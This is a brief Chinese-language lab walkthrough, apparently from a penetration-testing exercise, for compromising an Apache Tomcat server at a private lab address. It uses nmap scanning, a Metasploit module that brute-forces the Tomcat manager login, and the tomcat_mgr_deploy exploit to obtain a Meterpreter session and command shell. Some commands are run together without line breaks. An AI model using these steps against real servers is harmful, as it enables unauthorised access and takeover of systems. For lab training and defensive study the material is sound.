实验环境
ip 10.1.1.4 端口 8080已打开(tomcat默认开启端口)
1、打开metasploit console控制台
2、对网段开放了8080端口的主机进行扫描
nmap -sV 10.1.1.0/24 -p 8080
3、搜索msf关于tomcat可用模块
search tomcat
4、使用模块
use auxiliary/scanner/http/tomcat_mgr_login
查看配置
show options
设置
set rhosts 10.1.1.4
执行
run
可以获得tomcat的用户名密码
继续使用来getshell
use exploit/multi/http/tomcat_mgr_deployshow optionsset username xxxset password xxxset rhost 10.1.1.4set rport 8080run
成功后,返回meterpreter
shell获取服务器cmdshell